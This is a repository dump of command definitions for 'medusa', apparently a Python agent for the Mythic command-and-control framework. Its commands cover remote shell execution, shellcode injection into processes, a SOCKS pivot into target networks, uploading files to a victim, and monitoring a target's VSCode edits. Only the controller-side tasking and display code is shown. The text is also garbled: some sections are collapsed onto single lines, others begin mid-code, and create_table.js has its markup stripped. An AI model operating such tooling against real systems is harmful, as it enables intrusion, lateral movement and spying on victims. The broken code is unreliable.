            CommandParameter(
                name="path",
                type=ParameterType.String,
                parameter_group_info=[ParameterGroupInfo(
                    required=False
                )],
                description="Path of file or folder on the current system to list",
            )
        ]

    async def parse_arguments(self):
        if not self.command_line:
            # No argument supplied: list the current directory.
            self.add_arg("path", ".")
            return
        if self.command_line[0] != '{':
            self.add_arg("path", self.command_line)
            return
        parsed = json.loads(self.command_line)
        if "host" in parsed:
            # Tasking originated from the file browser UI.
            self.add_arg("path", parsed["path"] + "/" + parsed["file"])
            self.add_arg("file_browser", True, type=ParameterType.Boolean)
        else:
            self.add_arg("path", parsed["path"])


class LsCommand(CommandBase):
    """File/folder listing command backing the Mythic file browser."""

    cmd = "ls"
    needs_admin = False
    help_cmd = "ls [/path/to/file]"
    description = "Get attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine"
    version = 1
    author = "@ajpc500"
    attackmapping = ["T1083"]
    supported_ui_features = ["file_browser:list"]
    is_file_browse = True
    argument_class = LsArguments
    browser_script = BrowserScript(script_name="ls", author="@its_a_feature_", for_new_ui=True)
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        from_browser = task.args.has_arg("file_browser") and task.args.get_arg("file_browser")
        if from_browser:
            # Browser tasking: prefix the path with the callback host.
            task.display_params = task.callback.host + ":" + task.args.get_arg("path")
        else:
            task.display_params = task.args.get_arg("path")
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
class MvCommand(CommandBase):
    """Move a file or folder from source to destination on the target host."""

    cmd = "mv"
    needs_admin = False
    help_cmd = "mv source destination"
    description = "Move file or folder to destination"
    version = 1
    author = "@ajpc500"
    attackmapping = []
    argument_class = MvArguments
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        src = str(task.args.get_arg("source"))
        dst = str(task.args.get_arg("destination"))
        task.display_params = "Moving " + src + " to " + dst
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)


class PipFreezeArguments(TaskArguments):
    """pip_freeze takes no arguments."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = []

    async def parse_arguments(self):
        pass


class PipFreezeCommand(CommandBase):
    """Enumerate the Python modules installed on the target."""

    cmd = "pip_freeze"
    needs_admin = False
    help_cmd = "pip_freeze"
    description = "This programmatically lists all installed modules."
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = False
    is_remove_file = False
    is_upload_file = False
    author = "@ajpc500"
    argument_class = PipFreezeArguments
    attackmapping = []
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)


class PsArguments(TaskArguments):
    """ps takes no arguments."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = []

    async def parse_arguments(self):
        pass


class PsCommand(CommandBase):
    """Limited process listing (Windows/Linux), feeds the process browser."""

    cmd = "ps"
    needs_admin = False
    help_cmd = "ps"
    description = "Get limited process listing"
    version = 2
    author = "@ajpc500"
    attackmapping = ["T1106"]
    supported_ui_features = ["process_browser:list"]
    argument_class = PsArguments
    browser_script = BrowserScript(script_name="ps", author="@ajpc500", for_new_ui=True)
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        task.display_params = "Getting limited process listing"
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
class PsFullArguments(TaskArguments):
    """ps_full takes no arguments."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = []

    async def parse_arguments(self):
        pass


class PsFullCommand(CommandBase):
    """Full process listing (Windows, Python 3.8 agents only)."""

    cmd = "ps_full"
    needs_admin = False
    help_cmd = "ps_full"
    description = "Get full process listing."
    version = 2
    author = "@ajpc500"
    attackmapping = ["T1106"]
    supported_ui_features = ["process_browser:list"]
    argument_class = PsFullArguments
    browser_script = BrowserScript(script_name="ps_full", author="@ajpc500", for_new_ui=True)
    attributes = CommandAttributes(
        supported_python_versions=["Python 3.8"],
        supported_os=[SupportedOS.Windows],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        task.display_params = "Getting full process listing"
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
class RmCommand(CommandBase):
    """Delete a file or folder on the target."""

    cmd = "rm"
    needs_admin = False
    help_cmd = "rm /path/to/file"
    description = "Delete a file or folder"
    version = 1
    author = "@ajpc500"
    attackmapping = ["T1485"]
    supported_ui_features = ["file_browser:remove"]
    argument_class = RmArguments
    # NOTE(review): reuses the "ls" browser script and omits for_new_ui —
    # confirm this is intentional rather than a copy/paste leftover.
    browser_script = BrowserScript(script_name="ls", author="@its_a_feature_")
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        task.display_params = "Deleting " + str(task.args.get_arg("path"))
        return task

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        return PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)


class ScreenshotArguments(TaskArguments):
    """screenshot takes no arguments."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = []

    async def parse_arguments(self):
        pass
class ShellArguments(TaskArguments):
    """Arguments for shell: the raw command line to execute on the target."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="command",
                type=ParameterType.String,
                description="Command to run"
            ),
        ]

    async def parse_arguments(self):
        # The whole command line is passed through verbatim.
        if not self.command_line:
            raise ValueError("Must supply a command to run")
        self.add_arg("command", self.command_line)

    async def parse_dictionary(self, dictionary_arguments):
        self.load_args_from_dictionary(dictionary_arguments)
class ShinjectArguments(TaskArguments):
    """Arguments for shinject: a shellcode file plus the target process ID."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="shellcode",
                type=ParameterType.File,
                description="Shellcode to inject"
            ),
            CommandParameter(
                name="process_id",
                type=ParameterType.Number,
                description="ID of process to inject into",
            ),
        ]

    async def parse_arguments(self):
        # Only JSON tasking is supported (file parameters cannot be free-form).
        if not self.command_line:
            raise ValueError("Missing arguments")
        if self.command_line[0] != "{":
            raise ValueError("Missing JSON arguments")
        self.load_args_from_json_string(self.command_line)
def positiveTime(val):
    """Parameter validator used by sleep: reject negative time values.

    Returns None when *val* is acceptable; raises ValueError otherwise.
    """
    is_valid = val >= 0
    if not is_valid:
        raise ValueError("Value must be positive")
pieces = self.command_line.split(" ") if len(pieces) == 1: self.add_arg("seconds", pieces[0]) self.remove_arg("jitter") elif len(pieces) == 2: self.add_arg("seconds", pieces[0]) self.add_arg("jitter", pieces[1]) else: raise Exception("Wrong number of parameters, should be 1 or 2") else: self.load_args_from_json_string(self.command_line) class SleepCommand(CommandBase): cmd = "sleep" needs_admin = False help_cmd = "sleep seconds jitter_percentage" description = "set sleep and jitter" version = 1 author = "@ajpc500" attackmapping = [] argument_class = SleepArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = str(task.args.get_arg("seconds")) + "s" if int(task.args.get_arg("jitter")) != -1: task.display_params += " with " + str(task.args.get_arg("jitter")) + "% jitter" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) await SendMythicRPCCallbackUpdate(MythicRPCCallbackUpdateMessage( TaskID=task.Task.ID, SleepInfo=response, )) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/socks.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class SocksArguments(TaskArguments): valid_actions = ["start", "stop"] def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="action", choices=["start","stop"], parameter_group_info=[ParameterGroupInfo( required=True )], type=ParameterType.ChooseOne, description="Start or stop the socks server." 
), CommandParameter( name="port", parameter_group_info=[ParameterGroupInfo( required=False )], type=ParameterType.Number, description="Port to start the socks server on." ), ] async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) async def parse_arguments(self): if len(self.command_line) == 0: raise Exception("Must be passed \"start\" or \"stop\" commands on the command line.") try: self.load_args_from_json_string(self.command_line) except: parts = self.command_line.lower().split() action = parts[0] if action not in self.valid_actions: raise Exception("Invalid action \"{}\" given. Require one of: {}".format(action, ", ".join(self.valid_actions))) self.add_arg("action", action) if action == "start": port = -1 if len(parts) < 2: port = 7005 else: try: port = int(parts[1]) except Exception as e: raise Exception("Invalid port number given: {}. Must be int.".format(parts[1])) self.add_arg("port", port, ParameterType.Number) class SocksCommand(CommandBase): cmd = "socks" needs_admin = False help_cmd = "socks [action] [port number]" description = "Enable SOCKS 5 compliant proxy on the agent such that you may proxy data in from an outside machine into the target network." 
version = 1 is_exit = False is_file_browse = False is_process_list = False is_download_file = False is_upload_file = False is_remove_file = False author = "@ajpc500" argument_class = SocksArguments attackmapping = ["T1090"] attributes = CommandAttributes( supported_python_versions=["Python 3.8", "Python 2.7"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse: response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) if taskData.args.get_arg("action") == "start": resp = await SendMythicRPCProxyStartCommand(MythicRPCProxyStartMessage( TaskID=taskData.Task.ID, PortType="socks", LocalPort=taskData.args.get_arg("port") )) if not resp.Success: response.TaskStatus = MythicStatus.Error response.Stderr = resp.Error await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage( TaskID=taskData.Task.ID, Response=resp.Error.encode() )) else: response.DisplayParams = "Started SOCKS5 server on port {}".format(taskData.args.get_arg("port")) else: resp = await SendMythicRPCProxyStopCommand(MythicRPCProxyStopMessage( TaskID=taskData.Task.ID, PortType="socks", Port=taskData.args.get_arg("port") )) if not resp.Success: response.TaskStatus = MythicStatus.Error response.Stderr = resp.Error await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage( TaskID=taskData.Task.ID, Response=resp.Error.encode() )) else: response.DisplayParams = "Stopped SOCKS5 server on port {}".format(taskData.args.get_arg("port")) return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/spawn_jxa.py ================================================ from 
mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json import sys import base64 class SpawnJxaArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.File, description="Script file to load" ), CommandParameter( name="language", type=ParameterType.ChooseOne, choices=[ "JavaScript", "AppleScript" ], default_value="JavaScript", description="Language of script to load" ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: raise ValueError("Missing JSON arguments") else: raise ValueError("Missing arguments") class SpawnJxaCommand(CommandBase): cmd = "spawn_jxa" needs_admin = False help_cmd = "spawn_jxa" description = ( "Spawn an osascript process and pipe script content to it." ) version = 1 author = "@ajpc500" attackmapping = [] argument_class = SpawnJxaArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: file_resp = await MythicRPC().execute( "get_file", task_id=task.id, file_id=task.args.get_arg("file"), get_contents=False ) if file_resp.status == MythicStatus.Success: original_file_name = file_resp.response[0]["filename"] task.display_params = f"Spawning osascript and loading script: {original_file_name}" else: raise Exception("Failed to register file: " + file_resp.error) file_resp = await MythicRPC().execute("update_file", file_id=task.args.get_arg("file"), delete_after_fetch=True, comment="Uploaded and piped to new osascript process") return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp 
class UnloadArguments(TaskArguments):
    """Arguments for unload: the name of a currently loaded command."""

    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="command",
                type=ParameterType.ChooseOne,
                description="Command to unload from the agent",
                choices_are_all_commands=True,
                choices_are_loaded_commands=True
            )
        ]

    async def parse_arguments(self):
        # FIX: guard against an empty command line; the original indexed
        # command_line[0] unconditionally and raised IndexError on "".
        if len(self.command_line) == 0:
            raise ValueError("Must supply the name of a command to unload")
        if self.command_line[0] != "{":
            self.add_arg("command", self.command_line)
        else:
            self.load_args_from_json_string(self.command_line)

    async def parse_dictionary(self, dictionary_arguments):
        self.load_args_from_dictionary(dictionary_arguments)


class UnloadCommand(CommandBase):
    cmd = "unload"
    needs_admin = False
    help_cmd = "unload cmd"
    description = "This unloads an existing function from a callback."
    version = 1
    author = "@ajpc500"
    parameters = []
    attackmapping = ["T1030", "T1129"]
    argument_class = UnloadArguments
    attributes = CommandAttributes(
        supported_python_versions=["Python 2.7", "Python 3.8"],
        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux],
    )

    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
        """Echo the command being unloaded in the display params."""
        response = PTTaskCreateTaskingMessageResponse(
            TaskID=taskData.Task.ID,
            Success=True,
        )
        unload_cmd = taskData.args.get_arg("command")
        response.DisplayParams = f"command: {unload_cmd}"
        return response

    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:
        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)
        return resp
cryptography" ) ] async def parse_arguments(self): if len(self.command_line) > 0: if self.command_line[0] == "{": self.load_args_from_json_string(self.command_line) else: self.add_arg("module_name", self.command_line) else: raise ValueError("Missing arguments") class UnloadModuleCommand(CommandBase): cmd = "unload_module" needs_admin = False help_cmd = "unload_module [module]" description = ( "Unload an in-memory Python module from the agent" ) version = 1 author = "@ajpc500" attackmapping = [] argument_class = UnloadModuleArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = f"Unloading {task.args.get_arg('module_name')} module" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/upload.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json, sys, base64 class UploadArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="file", type=ParameterType.File, description="file to upload" ), CommandParameter( name="remote_path", type=ParameterType.String, description="/remote/path/on/victim.txt", ), ] async def parse_arguments(self): if len(self.command_line) == 0: raise ValueError("Must supply arguments") raise ValueError("Must supply named arguments or use the modal") async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class UploadCommand(CommandBase): cmd 
= "upload" needs_admin = False help_cmd = "upload" description = ( "Upload a file to the target machine by selecting a file from your computer. " ) version = 1 supported_ui_features = ["file_browser:upload"] author = "@its_a_feature_" attackmapping = ["T1132", "T1030", "T1105"] argument_class = UploadArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse: response = MythicCommandBase.PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID, Success=True, ) try: file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage( TaskID=taskData.Task.ID, AgentFileID=taskData.args.get_arg("file") )) if file_resp.Success: if len(file_resp.Files) > 0: original_file_name = file_resp.Files[0].Filename if len(taskData.args.get_arg("remote_path")) == 0: taskData.args.add_arg("remote_path", original_file_name) elif taskData.args.get_arg("remote_path")[-1] == "/": taskData.args.add_arg("remote_path", taskData.args.get_arg("remote_path") + original_file_name) response.DisplayParams = f"{original_file_name} to {taskData.args.get_arg('remote_path')}" else: raise Exception("Failed to find that file") else: raise Exception("Error from Mythic trying to get file: " + str(file_resp.Error)) except Exception as e: raise Exception("Error from Mythic: " + str(sys.exc_info()[-1].tb_lineno) + " : " + str(e)) return response async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/vscode_list_recent.py ================================================ from 
mythic_container.MythicCommandBase import * import json from mythic_container.MythicRPC import * import sys class VscodeListRecentArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="db", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], default_value="", description="Path to VSCode state database", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("db", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class VscodeListRecentCommand(CommandBase): cmd = "vscode_list_recent" needs_admin = False help_cmd = "vscode_list_recent [state_db_path]" description = "Lists recently accessed files/folders in VSCode state database" version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [] argument_class = VscodeListRecentArguments browser_script = BrowserScript(script_name="vscode_recent", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.get_arg("db"): task.display_params = "Listing recent VSCode files from state database at " + task.args.get_arg("db") else: task.display_params = "Listing recent VSCode files from state database at '~/Library/Application Support/Code/User/globalStorage/state.vscdb'" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/vscode_open_edits.py ================================================ from mythic_container.MythicCommandBase import * 
import json from mythic_container.MythicRPC import * import sys class VscodeOpenEditsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="backups_path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], default_value="", description="Path to VSCode backups directory", ) ] async def parse_arguments(self): if len(self.command_line) > 0: self.add_arg("backups_path", self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class VscodeOpenEditsCommand(CommandBase): cmd = "vscode_open_edits" needs_admin = False help_cmd = "vscode_open_edits [backups_dir_path]" description = "Lists edited files in VSCode that have not been saved." version = 1 author = "@ajpc500" attackmapping = [] supported_ui_features = [] argument_class = VscodeOpenEditsArguments browser_script = BrowserScript(script_name="vscode_edits", author="@ajpc500", for_new_ui=True) attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[ SupportedOS.MacOS ], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.get_arg("backups_path"): task.display_params = "Listing edited and unsaved files in VSCode from backup directory: " + task.args.get_arg("backups_path") else: task.display_params = "Listing edited and unsaved files in VSCode from backup directory: '~/Library/Application Support/Code/Backups'" return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/vscode_watch_edits.py ================================================ from mythic_container.MythicCommandBase import * from 
mythic_container.MythicRPC import * import json class VscodeWatchEditsArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="backups_path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=False )], description="Path of VSCode backups folder ", ), CommandParameter( name="seconds", type=ParameterType.Number, parameter_group_info=[ParameterGroupInfo( required=False )], default_value=60, description="Seconds to wait between polling directory for changes", ) ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("backups_path", pieces[0]) self.add_arg("seconds", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class VscodeWatchEditsCommand(CommandBase): cmd = "vscode_watch_edits" needs_admin = False help_cmd = "vscode_watch_edits [/path/to/backups/dir]" description = "Poll VSCode backups directory for unsaved edits" version = 1 author = "@ajpc500" attackmapping = ["T1083"] argument_class = VscodeWatchEditsArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS], ) async def create_tasking(self, task: MythicTask) -> MythicTask: if task.args.get_arg("backups_path"): task.display_params = "Watching for VSCode edits. Polling '{}' for changes every {} seconds".format(task.args.get_arg("backups_path"), str(task.args.get_arg("seconds"))) else: task.display_params = "Watching for VSCode edits. 
Polling '{}' for changes every {} seconds".format("~/Library/Application Support/Code/Backups", str(task.args.get_arg("seconds"))) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/agent_functions/watch_dir.py ================================================ from mythic_container.MythicCommandBase import * from mythic_container.MythicRPC import * import json class WatchDirArguments(TaskArguments): def __init__(self, command_line, **kwargs): super().__init__(command_line, **kwargs) self.args = [ CommandParameter( name="path", type=ParameterType.String, parameter_group_info=[ParameterGroupInfo( required=True )], description="Path of folder on the current system to watch", ), CommandParameter( name="seconds", type=ParameterType.Number, parameter_group_info=[ParameterGroupInfo( required=False )], default_value=60, description="Seconds to wait between polling directory for changes", ) ] async def parse_arguments(self): if self.command_line[0] != "{": pieces = self.command_line.split(" ") if len(pieces) == 2: self.add_arg("path", pieces[0]) self.add_arg("seconds", pieces[1]) else: raise Exception("Wrong number of parameters, should be 2") else: self.load_args_from_json_string(self.command_line) async def parse_dictionary(self, dictionary_arguments): self.load_args_from_dictionary(dictionary_arguments) class WatchDirCommand(CommandBase): cmd = "watch_dir" needs_admin = False help_cmd = "watch_dir [/path/to/file]" description = "Poll a directory for changes" version = 1 author = "@ajpc500" attackmapping = ["T1083"] argument_class = WatchDirArguments attributes = CommandAttributes( supported_python_versions=["Python 2.7", "Python 3.8"], supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ], ) async 
def create_tasking(self, task: MythicTask) -> MythicTask: task.display_params = "Polling {} for changes every {} seconds".format(task.args.get_arg("path"), str(task.args.get_arg("seconds"))) return task async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse: resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True) return resp ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/copy_additional_info_to_clipboard.js ================================================ function(elem){ function copyStringToClipboard(str) { // Create new element let el = document.createElement('textarea'); // Set value (string to be copied) el.value = str; // Set non-editable to avoid focus and move outside of view el.setAttribute('readonly', ''); el.style = {position: 'absolute', left: '-9999px'}; document.body.appendChild(el); // Select text inside element el.select(); // Copy text to clipboard document.execCommand('copy'); // Remove temporary element document.body.removeChild(el); alertTop("info", "Copied...", 1); } var content = atob(elem.getAttribute("additional-info")); copyStringToClipboard(content); } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/create_table.js ================================================ function(headers, data){ let output = ""; output += ""; for(let i = 0; i < headers.length; i++){ output += ""; } output += ""; for(let i = 0; i < data.length; i++){ output += ""; for(let j = 0; j < headers.length; j++){ if(data[i]['cell-style'].hasOwnProperty(headers[j])){ output += ""; } else{ output += ""; } } output += ""; } output += "
" + headers[i]['name'].toUpperCase() + "
" + data[i][headers[j]['name']] + "" + data[i][headers[j]['name']] + "
"; return output; } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/download.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); return {"download":[{ "agent_file_id": data["agent_file_id"], "variant": "contained", "name": "Download " + task["display_params"] }]}; }catch(error){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } }else if(task.status === "processed"){ if(responses.length > 0){ const task_data = JSON.parse(responses[0]); return {"plaintext": "Downloading file with " + task_data["total_chunks"] + " total chunks..."}; } return {"plaintext": "No data yet..."} }else{ // this means we shouldn't have any output return {"plaintext": "No response yet from agent..."} } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/download_bulk.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; } else if(task.completed){ if(responses.length === 0){ return {'plaintext': 'No response from agent.'}; } // Iterative mode returns one JSON object per file, one per line. // Archive mode returns a single JSON object with agent_file_id. const lines = responses[0].split('\n').filter(l => l.trim().length > 0); let downloads = []; let plainLines = []; for(let i = 0; i < lines.length; i++){ try{ let data = JSON.parse(lines[i].replace((new RegExp("'", 'g')), '"')); if("agent_file_id" in data){ let label = "file_path" in data ? 
"Download " + data["file_path"] : "Download " + task["display_params"]; downloads.push({ "agent_file_id": data["agent_file_id"], "variant": "contained", "name": label }); } else { plainLines.push(lines[i]); } } catch(error){ plainLines.push(lines[i]); } } if(downloads.length > 0){ let result = {"download": downloads}; if(plainLines.length > 0){ result["plaintext"] = plainLines.join('\n'); } return result; } return {'plaintext': responses[0]}; } else if(task.status === "processed"){ if(responses.length > 0){ try{ const task_data = JSON.parse(responses[0]); if("total_chunks" in task_data){ return {"plaintext": "Downloading with " + task_data["total_chunks"] + " total chunks..."}; } } catch(error){} return {"plaintext": responses[0]}; } return {"plaintext": "No data yet..."}; } else { return {"plaintext": "No response yet from agent..."}; } } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/file_size_to_human_readable_string.js ================================================ function(fileSize){ var thresh = 1024; if(Math.abs(fileSize) < thresh) { return fileSize + ' B'; } var units = ['KB','MB','GB','TB','PB','EB','ZB','YB']; var u = -1; do { fileSize /= thresh; ++u; } while(Math.abs(fileSize) >= thresh && u < units.length - 1); return fileSize.toFixed(1)+' '+units[u]; return output; } ================================================ FILE: Payload_Type/medusa/medusa/mythic/browser_scripts/jobs.js ================================================ function(task, responses){ if(task.status.includes("error")){ const combined = responses.reduce( (prev, cur) => { return prev + cur; }, ""); return {'plaintext': combined}; }else if(task.completed){ if(responses.length > 0){ try{ let data = JSON.parse(responses[0].replace((new RegExp("'", 'g')), '"')); let entries = data["jobs"]; let output_table = []; for(let i = 0; i < entries.length; i++){ output_table.push({ "command":{"plaintext": entries[i][0]}, "task_id": 
